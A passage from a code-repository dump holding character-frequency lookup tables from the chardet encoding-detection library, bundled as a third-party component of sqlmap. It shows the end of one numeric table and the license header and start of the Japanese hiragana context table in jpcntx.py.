1328\n6033,6034,6035,6036,6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048, # 1344\n6049,6050,6051,6052,6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064, # 1360\n6065,6066,6067,6068,6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080, # 1376\n6081,6082,6083,6084,6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096, # 1392\n6097,6098,6099,6100,6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112, # 1408\n6113,6114,2044,2060,4621, 997,1235, 473,1186,4622, 920,3378,6115,6116, 379,1108, # 1424\n4313,2657,2735,3934,6117,3809, 636,3233, 573,1026,3693,3435,2974,3300,2298,4105, # 1440\n 854,2937,2463, 393,2581,2417, 539, 752,1280,2750,2480, 140,1161, 440, 708,1569, # 1456\n 665,2497,1746,1291,1523,3000, 164,1603, 847,1331, 537,1997, 486, 508,1693,2418, # 1472\n1970,2227, 878,1220, 299,1030, 969, 652,2751, 624,1137,3301,2619,  65,3302,2045, # 1488\n1761,1859,3120,1930,3694,3516, 663,1767, 852, 835,3695, 269, 767,2826,2339,1305, # 1504\n 896,1150, 770,1616,6118, 506,1502,2075,1012,2519, 775,2520,2975,2340,2938,4314, # 1520\n3028,2086,1224,1943,2286,6119,3072,4315,2240,1273,1987,3935,1557, 175, 597, 985, # 1536\n3517,2419,2521,1416,3029, 585, 938,1931,1007,1052,1932,1685,6120,3379,4316,4623, # 1552\n 804, 599,3121,1333,2128,2539,1159,1554,2032,3810, 687,2033,2904, 952, 675,1467, # 1568\n3436,6121,2241,1096,1786,2440,1543,1924, 980,1813,2228, 781,2692,1879, 728,1918, # 1584\n3696,4624, 548,1950,4625,1809,1088,1356,3303,2522,1944, 502, 972, 373, 513,2827, # 1600\n 586,2377,2391,1003,1976,1631,6122,2464,1084, 648,1776,4626,2141, 324, 962,2012, # 1616\n2177,2076,1384, 742,2178,1448,1173,1810, 222, 102, 301, 445, 125,2420, 662,2498, # 1632\n 277, 200,1476,1165,1068, 224,2562,1378,1446, 450,1880, 659, 791, 582,4627,2939, # 1648\n3936,1516,1274, 555,2099,3697,1020,1389,1526,3380,1762,1723,1787,2229, 412,2114, # 1664\n1900,2392,3518, 512,2597, 427,1925,2341,3122,1653,1686,2465,2499, 697, 330, 273, # 1680\n 380,2162, 951, 832, 780, 991,1301,3073, 965,2270,3519, 668,2523,2636,1286, 535, # 1696\n1407, 518, 671, 957,2658,2378, 267, 611,2197,3030,6123, 248,2299, 967,1799,2356, # 1712\n 850,1418,3437,1876,1256,1480,2828,1718,6124,6125,1755,1664,2405,6126,4628,2879, # 1728\n2829, 499,2179, 676,4629, 557,2329,2214,2090, 325,3234, 464, 811,3001, 992,2342, # 1744\n2481,1232,1469, 303,2242, 466,1070,2163, 603,1777,2091,4630,2752,4631,2714, 322, # 1760\n2659,1964,1768, 481,2188,1463,2330,2857,3600,2092,3031,2421,4632,2318,2070,1849, # 1776\n2598,4633,1302,2254,1668,1701,2422,3811,2905,3032,3123,2046,4106,1763,1694,4634, # 1792\n1604, 943,1724,1454, 917, 868,2215,1169,2940, 552,1145,1800,1228,1823,1955, 316, # 1808\n1080,2510, 361,1807,2830,4107,2660,3381,1346,1423,1134,4108,6127, 541,1263,1229, # 1824\n1148,2540, 545, 465,1833,2880,3438,1901,3074,2482, 816,3937, 713,1788,2500, 122, # 1840\n1575, 195,1451,2501,1111,6128, 859, 374,1225,2243,2483,4317, 390,1033,3439,3075, # 1856\n2524,1687, 266, 793,1440,2599, 946, 779, 802, 507, 897,1081, 528,2189,1292, 711, # 1872\n1866,1725,1167,1640, 753, 398,2661,1053, 246, 348,4318, 137,1024,3440,1600,2077, # 1888\n2129, 825,4319, 698, 238, 521, 187,2300,1157,2423,1641,1605,1464,1610,1097,2541, # 1904\n1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920\n1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936\n1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952\n1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968\n1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984\n1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000\n 606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016\n 684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032\n1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048\n2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064\n2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080\n2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096\n3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112\n3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128\n 884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144\n3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160\n1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876,  78,2287,1482,1277, # 2176\n 861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192\n2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208\n1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224\n 576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240\n3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256\n4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272\n2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288\n1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304\n2601,1919,1078,  75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320\n1075, 292,3818,1756,2602, 317,  98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336\n 385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352\n 178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368\n1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384\n2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400\n2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416\n2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432\n3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448\n1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464\n2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480\n 359,2291,1676,  73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496\n 837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512\n 855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528\n1209,  96, 587,2166,1032, 260,1072,2153, 173,  94, 226,3244, 819,2006,4642,4114, # 2544\n2203, 231,1744, 782,  97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560\n 633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576\n1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592\n1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608\n 353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624\n1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640\n1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656\n1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672\n 764,2861,1853, 688,2429,1920,1462,  77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688\n2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704\n 278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720\n2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736\n3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752\n2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768\n1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784\n6147, 441, 762,1771,3447,3607,3608,1904, 840,3037,  86, 939,1385, 572,1370,2445, # 2800\n1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816\n2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832\n1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848\n 470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864\n  72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880\n3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896\n3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912\n1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928\n1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944\n1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960\n1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976\n 123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992\n 913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008\n2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024\n 900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040\n3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056\n2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072\n 423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088\n1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104\n2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120\n 220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136\n1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152\n 745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168\n4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184\n2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200\n1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216\n 666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232\n1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248\n2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264\n 376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280\n6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296\n1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312\n1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328\n2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344\n3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360\n 914,2550,2587,  81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376\n3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392\n1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408\n 674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424\n1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440\n 199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456\n3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472\n 370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488\n2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504\n 414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520\n4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536\n2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552\n1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568\n1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584\n1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600\n 166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616\n1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632\n3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648\n1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664\n3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680\n 264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696\n 543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712\n 983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728\n2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744\n1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760\n 867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776\n1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792\n 894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808\n1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824\n 530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840\n 839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856\n 480,2083,1774,3458, 923,2279,1350, 221,3086,  85,2233,2234,3835,1585,3010,2147, # 3872\n1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888\n1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904\n2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920\n4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936\n 227,1351,1645,2453,2193,1421,2887, 812,2121, 634,  95,2435, 201,2312,4665,1646, # 3952\n1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968\n 328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984\n1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000\n3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016\n1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032\n2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048\n2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064\n1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080\n1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096\n2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112\n 455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128\n2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144\n1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160\n1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176\n1279,2136,1697,2335, 204, 721,2097,3838,  90,6186,2085,2505, 191,3967, 124,2148, # 4192\n1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208\n3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224\n2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240\n2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256\n 575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272\n3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288\n3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304\n1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320\n2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336\n1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352\n2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368  #last 512\n)\n\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/jpcntx.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n\n# This is hiragana 2-char sequence table, the number in each cell represents its frequency category\njp2CharContext = (\n(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),\n(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),\n(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),\n(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4),\n(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),\n(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4),\n(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),\n(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3),\n(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),\n(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4),\n(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4),\n(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3),\n(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3),\n(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3),\n(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4),\n(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3),\n(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4),\n(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3),\n(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5),\n(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3),\n(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5),\n(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4),\n(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4),\n(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3),\n(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,